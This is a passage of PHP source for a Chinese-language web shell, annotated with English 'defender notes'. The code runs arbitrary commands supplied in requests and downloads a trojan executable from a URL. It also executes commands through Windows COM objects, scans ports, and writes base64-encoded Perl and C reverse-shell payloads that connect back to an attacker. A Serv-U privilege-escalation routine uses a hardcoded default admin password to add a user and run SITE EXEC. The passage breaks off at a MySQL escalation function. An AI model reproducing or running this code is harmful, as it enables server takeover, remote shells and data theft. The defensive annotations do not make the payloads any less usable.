$adminmail = (isset($_SERVER['SERVER_ADMIN'])) ? "".$_SERVER['SERVER_ADMIN']."" : "".get_cfg_var("sendmail_from")."";

if($dis_func == ""){$dis_func = "No";}else{$dis_func = str_replace(" ","

",$dis_func);$dis_func = str_replace(",","

",$dis_func);}

$phpinfo = (!eregi("phpinfo",$dis_func)) ? "Yes" : "No";

$info = array(

array("服务器时间",date("Y年m月d日 h:i:s",time())),

array("服务器域名","".$_SERVER['SERVER_NAME'].""),

array("服务器IP地址",gethostbyname($_SERVER['SERVER_NAME'])),

array("服务器操作系统",PHP_OS),

array("服务器操作系统文字编码",$_SERVER['HTTP_ACCEPT_LANGUAGE']),

array("服务器解译引擎",$_SERVER['SERVER_SOFTWARE']),

array("你的IP",getenv('REMOTE_ADDR')),

array("Web服务端口",$_SERVER['SERVER_PORT']),

array("PHP运行方式",strtoupper(php_sapi_name())),

array("PHP版本",PHP_VERSION),

array("运行于安全模式",Info_Cfg("safemode")),

array("服务器管理员",$adminmail),

array("本文件路径",__FILE__),

array("允许使用 URL 打开文件 allow_url_fopen",Info_Cfg("allow_url_fopen")),

array("允许动态加载链接库 enable_dl",Info_Cfg("enable_dl")),

array("显示错误信息 display_errors",Info_Cfg("display_errors")),

array("自动定义全局变量 register_globals",Info_Cfg("register_globals")),

array("magic_quotes_gpc",Info_Cfg("magic_quotes_gpc")),

array("程序最多允许使用内存量 memory_limit",Info_Cfg("memory_limit")),

array("POST最大字节数 post_max_size",Info_Cfg("post_max_size")),

array("允许最大上传文件 upload_max_filesize",$upsize),

array("程序最长运行时间 max_execution_time",Info_Cfg("max_execution_time")."秒"),

array("被禁用的函数 disable_functions",$dis_func),

array("phpinfo()",$phpinfo),

array("目前还有空余空间diskfreespace",intval(diskfreespace(".") / (1024 * 1024)).'Mb'),

array("图形处理 GD Library",Info_Fun("imageline")),

array("IMAP电子邮件系统",Info_Fun("imap_close")),

array("MySQL数据库",Info_Fun("mysql_close")),

array("SyBase数据库",Info_Fun("sybase_close")),

array("Oracle数据库",Info_Fun("ora_close")),

array("Oracle 8 数据库",Info_Fun("OCILogOff")),

array("PREL相容语法 PCRE",Info_Fun("preg_match")),

array("PDF文档支持",Info_Fun("pdf_close")),

array("Postgre SQL数据库",Info_Fun("pg_close")),

array("SNMP网络管理协议",Info_Fun("snmpget")),

array("压缩文件支持(Zlib)",Info_Fun("gzclose")),

array("XML解析",Info_Fun("xml_set_object")),

array("FTP",Info_Fun("ftp_login")),

array("ODBC数据库连接",Info_Fun("odbc_close")),

array("Session支持",Info_Fun("session_start")),

array("Socket支持",Info_Fun("fsockopen")),

);

echo '';

for($i = 0;$i < count($info);$i++){echo ''."\n";}

echo '
'.$info[$i][0].''.$info[$i][1].'
';

return true;

}

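// Command execution ("执行命令"): runs a request-supplied command line on the server and displays its output.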

/**
 * Run a command line through the first process-spawning function that is
 * available and return its captured output.
 *
 * The order tried is exec, shell_exec, system, passthru, then popen. The
 * command string is used exactly as received; Exec_g() in this listing passes
 * $_POST['cmd'] to it unmodified.
 *
 * Defender note: a fallback chain across these five functions is a common
 * web-shell signature. Listing them in disable_functions where the application
 * does not need them, and alerting when the web-server account spawns a shell
 * or interpreter, are the matching mitigations.
 *
 * @param string $cmd Command line to run; not validated or escaped here.
 * @return string|null|false Captured output, or '' when no method was available.
 */
function Exec_Run($cmd)

{

$res = '';

// exec() fills $res with an array of output lines, joined back with newlines.
if(function_exists('exec')){@exec($cmd,$res);$res = join("\n",$res);}

elseif(function_exists('shell_exec')){$res = @shell_exec($cmd);}

// system() and passthru() print directly, so their output is captured with output buffering.
elseif(function_exists('system')){@ob_start();@system($cmd);$res = @ob_get_contents();@ob_end_clean();}

elseif(function_exists('passthru')){@ob_start();@passthru($cmd);$res = @ob_get_contents();@ob_end_clean();}

// Last resort: read the command's output from a pipe in 1024-byte chunks.
elseif(@is_resource($f = @popen($cmd,"r"))){$res = '';while(!@feof($f)){$res .= @fread($f,1024);}@pclose($f);}

return $res;

}

function Exec_g()

{

$res = '回显窗口';

$cmd = 'dir';

if(!empty($_POST['cmd'])){$res = Exec_Run($_POST['cmd']);$cmd = $_POST['cmd'];}

print<<




命令参数









END;

return true;

}

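// Component interface ("组件接口"): fetches a request-supplied URL to a request-supplied path on disk and, on Windows hosts, uses COM objects to run commands or to run SQL over an ADODB connection string.
// Defender note: web applications rarely need PHP's COM support or remote URL reads via allow_url_fopen; leaving both disabled removes these code paths, and outbound fetches of executables by the web server are worth alerting on.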

function Com_h()

{

$object = isset($_GET['o']) ? $_GET['o'] : 'adodb';

print<<




END;

if($object == 'downloader')

{

$Com_durl = isset($_POST['durl']) ? $_POST['durl'] : 'http://www.baidu.com/down/muma.exe';

$Com_dpath= isset($_POST['dpath']) ? $_POST['dpath'] : File_Str(dirname(__FILE__).'/muma.exe');

print<<
超连接


下载到




END;

if((!empty($_POST['durl'])) && (!empty($_POST['dpath'])))

{

echo '
';

$contents = @file_get_contents($_POST['durl']);

if(!$contents) echo '无法读取要下载的数据';

else echo File_Write($_POST['dpath'],$contents,'wb') ? '下载文件成功' : '下载文件失败';

echo '
';

}

}

elseif($object == 'wscript')

{

$cmd = isset($_POST['cmd']) ? $_POST['cmd'] : 'dir';

print<<
执行CMD命令




END;

if(!empty($_POST['cmd']))

{

echo '
';

$shell = new COM('wscript');

$exe = @$shell->exec("cmd.exe /c ".$cmd);

$out = $exe->StdOut();

$output = $out->ReadAll();

echo '
'.$output.'
';

@$shell->Release();

$shell = NULL;

echo '
';

}

}

elseif($object == 'application')

{

$run = isset($_POST['run']) ? $_POST['run'] : 'cmd.exe';

$cmd = isset($_POST['cmd']) ? $_POST['cmd'] : 'copy c:\windows\php.ini c:\php.ini';

print<<
程序路径


命令参数




END;

if(!empty($_POST['run']))

{

echo '
';

$shell = new COM('application');

echo (@$shell->ShellExecute($run,'/c '.$cmd) == '0') ? '执行成功' : '执行失败';

@$shell->Release();

$shell = NULL;

echo '
';

}

}

elseif($object == 'adodb')

{

$string = isset($_POST['string']) ? $_POST['string'] : '';

$sql = isset($_POST['sql']) ? $_POST['sql'] : '';

print<<


连接字符串



SQL命令






END;

if(!empty($string))

{

echo '
';

$shell = new COM('adodb');

@$shell->Open($string);

$result = @$shell->Execute($sql);

$count = $result->Fields->Count();

for($i = 0;$i < $count;$i++){$Field[$i] = $result->Fields($i);}

echo $result ? $sql.' 执行成功

' : $sql.' 执行失败

';

if(!empty($count)){while(!$result->EOF){for($i = 0;$i < $count;$i++){echo htmlspecialchars($Field[$i]->value).'

';}@$result->MoveNext();}}

$shell->Close();

@$shell->Release();

$shell = NULL;

echo '
';

}

}

return true;

}

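// Port scan ("扫描端口"): attempts a TCP connection, with a 2-second timeout, to each listed port of a request-supplied host and reports it as open or closed.
// Defender note: a burst of short-lived outbound or loopback connections from the web-server process to many ports is the network-side trace of this function; egress filtering on the web tier limits its reach.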

function Port_i()

{

$Port_ip = isset($_POST['ip']) ? $_POST['ip'] : '127.0.0.1';

$Port_port = isset($_POST['port']) ? $_POST['port'] : '21|23|25|80|110|135|139|445|1433|3306|3389|43958';

print<<


扫描IP


端口号






END;

if((!empty($_POST['ip'])) && (!empty($_POST['port'])))

{

echo '
';

$ports = explode('|', $_POST['port']);

for($i = 0;$i < count($ports);$i++)

{

$fp = @fsockopen($_POST['ip'],$ports[$i],&$errno,&$errstr,2);

echo $fp ? '开放端口 ---> '.$ports[$i].'

' : '关闭端口 ---> '.$ports[$i].'

';

ob_flush();

flush();

}

echo '
';

}

return true;

}

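// Labelled "Linux privilege escalation" ("Linux提权"); the code below writes an embedded base64 payload to /tmp and launches it with a request-supplied address and port, which by its variable names and the listener hint it prints appears to be an outbound connect-back.
// Defender note: indicators visible in this block are the paths /tmp/spider_bc, /tmp/spider_bc.c, /tmp/angel_bc and /tmp/angel_bc.c, and the web-server account invoking perl or gcc. Mounting /tmp noexec and blocking unsolicited outbound connections from the web tier are the relevant controls.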

function Linux_k()

{

$yourip = isset($_POST['yourip']) ? $_POST['yourip'] : getenv('REMOTE_ADDR');

$yourport = isset($_POST['yourport']) ? $_POST['yourport'] : '12666';

print<<


你的地址


连接端口


执行方式




END;

if((!empty($_POST['yourip'])) && (!empty($_POST['yourport'])))

{

echo '
';

if($_POST['use'] == 'perl')

{

$back_connect_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".

"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".

"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".

"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".

"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".

"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".

"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";

echo File_Write('/tmp/spider_bc',base64_decode($back_connect_pl),'wb') ? '创建/tmp/spider_bc成功

' : '创建/tmp/spider_bc失败

';

$perlpath = Exec_Run('which perl');

$perlpath = $perlpath ? chop($perlpath) : 'perl';

echo Exec_Run($perlpath.' /tmp/spider_bc '.$_POST['yourip'].' '.$_POST['yourport'].' &') ? 'nc -l -n -v -p '.$_POST['yourport'] : '执行命令失败';

}

if($_POST['use'] == 'c')

{

$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC".

"BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb".

"SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd".

"KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ".

"sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC".

"Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D".

"QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp".

"Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";

echo File_Write('/tmp/spider_bc.c',base64_decode($back_connect_c),'wb') ? '创建/tmp/spider_bc.c成功

' : '创建/tmp/spider_bc.c失败

';

$res = Exec_Run('gcc -o /tmp/angel_bc /tmp/angel_bc.c');

@unlink('/tmp/spider_bc.c');

echo Exec_Run('/tmp/spider_bc '.$_POST['yourip'].' '.$_POST['yourport'].' &') ? 'nc -l -n -v -p '.$_POST['yourport'] : '执行命令失败';

}

echo '

你可以尝试连接端口 (nc -l -n -v -p '.$_POST['yourport'].')
';

}

return true;

}

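// Labelled "Serv-U privilege escalation" ("ServU提权"): logs in to a Serv-U administration port on 127.0.0.1 with request-supplied credentials (the form pre-fills a built-in default password), creates a domain and an FTP user through SITE MAINTENANCE, and can then issue SITE EXEC as that user.
// Defender note: the domain name "haxorcitos" in the request below is a searchable indicator in Serv-U configuration and logs; changing the local administrator password from its default and restricting access to the administration port close this path.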

function Servu_l()

{

$SUPass = isset($_POST['SUPass']) ? $_POST['SUPass'] : '#l@$ak#.lk;0@P';

print<<




ServU端口


ServU用户


ServU密码


END;

if($_GET['o'] == 'adduser')

{

print<<
帐号

密码

目录


END;

}

else

{

print<<
提权命令







END;

}

echo '
';

if((!empty($_POST['SUPort'])) && (!empty($_POST['SUUser'])) && (!empty($_POST['SUPass'])))

{

echo '
';

$sendbuf = "";

$recvbuf = "";

$domain = "-SETDOMAIN\r\n"."-Domain=haxorcitos|0.0.0.0|21|-1|1|0\r\n"."-TZOEnable=0\r\n"." TZOKey=\r\n";

$adduser = "-SETUSERSETUP\r\n"."-IP=0.0.0.0\r\n"."-PortNo=21\r\n"."-User=".$_POST['user']."\r\n"."-Password=".$_POST['password']."\r\n"."-HomeDir=c:\\\r\n"."-LoginMesFile=\r\n"."-Disable=0\r\n"."-RelPaths=1\r\n"."-NeedSecure=0\r\n"."-HideHidden=0\r\n"."-AlwaysAllowLogin=0\r\n"."-ChangePassword=0\r\n".

"-QuotaEnable=0\r\n"."-MaxUsersLoginPerIP=-1\r\n"."-SpeedLimitUp=0\r\n"."-SpeedLimitDown=0\r\n"."-MaxNrUsers=-1\r\n"."-IdleTimeOut=600\r\n"."-SessionTimeOut=-1\r\n"."-Expire=0\r\n"."-RatioUp=1\r\n"."-RatioDown=1\r\n"."-RatiosCredit=0\r\n"."-QuotaCurrent=0\r\n"."-QuotaMaximum=0\r\n".

"-Maintenance=None\r\n"."-PasswordType=Regular\r\n"."-Ratios=None\r\n"." Access=".$_POST['part']."\|RWAMELCDP\r\n";

$deldomain = "-DELETEDOMAIN\r\n"."-IP=0.0.0.0\r\n"." PortNo=21\r\n";

$sock = @fsockopen("127.0.0.1", $_POST["SUPort"], &$errno, &$errstr, 10);

$recvbuf = @fgets($sock, 1024);

echo "返回数据包: $recvbuf

";

$sendbuf = "USER ".$_POST["SUUser"]."\r\n";

@fputs($sock, $sendbuf, strlen($sendbuf));

echo "发送数据包: $sendbuf

";

$recvbuf = @fgets($sock, 1024);

echo "返回数据包: $recvbuf

";

$sendbuf = "PASS ".$_POST["SUPass"]."\r\n";

@fputs($sock, $sendbuf, strlen($sendbuf));

echo "发送数据包: $sendbuf

";

$recvbuf = @fgets($sock, 1024);

echo "返回数据包: $recvbuf

";

$sendbuf = "SITE MAINTENANCE\r\n";

@fputs($sock, $sendbuf, strlen($sendbuf));

echo "发送数据包: $sendbuf

";

$recvbuf = @fgets($sock, 1024);

echo "返回数据包: $recvbuf

";

$sendbuf = $domain;

@fputs($sock, $sendbuf, strlen($sendbuf));

echo "发送数据包: $sendbuf

";

$recvbuf = @fgets($sock, 1024);

echo "返回数据包: $recvbuf

";

$sendbuf = $adduser;

@fputs($sock, $sendbuf, strlen($sendbuf));

echo "发送数据包: $sendbuf

";

$recvbuf = @fgets($sock, 1024);

echo "返回数据包: $recvbuf

";

if(!empty($_POST['SUCommand']))

{

$exp = @fsockopen("127.0.0.1", "21", &$errno, &$errstr, 10);

$recvbuf = @fgets($exp, 1024);

echo "返回数据包: $recvbuf

";

$sendbuf = "USER ".$_POST['user']."\r\n";

@fputs($exp, $sendbuf, strlen($sendbuf));

echo "发送数据包: $sendbuf

";

$recvbuf = @fgets($exp, 1024);

echo "返回数据包: $recvbuf

";

$sendbuf = "PASS ".$_POST['password']."\r\n";

@fputs($exp, $sendbuf, strlen($sendbuf));

echo "发送数据包: $sendbuf

";

$recvbuf = @fgets($exp, 1024);

echo "返回数据包: $recvbuf

";

$sendbuf = "site exec ".$_POST["SUCommand"]."\r\n";

@fputs($exp, $sendbuf, strlen($sendbuf));

echo "发送数据包: site exec ".$_POST["SUCommand"]."

";

$recvbuf = @fgets($exp, 1024);

echo "返回数据包: $recvbuf

";

$sendbuf = $deldomain;

@fputs($sock, $sendbuf, strlen($sendbuf));

echo "发送数据包: $sendbuf

";

$recvbuf = @fgets($sock, 1024);

echo "返回数据包: $recvbuf

";

@fclose($exp);

}

@fclose($sock);

echo '
';

}

}

// Labelled "MySQL privilege escalation" ("MYSQL提权"); the function that follows is cut off in this listing.

functio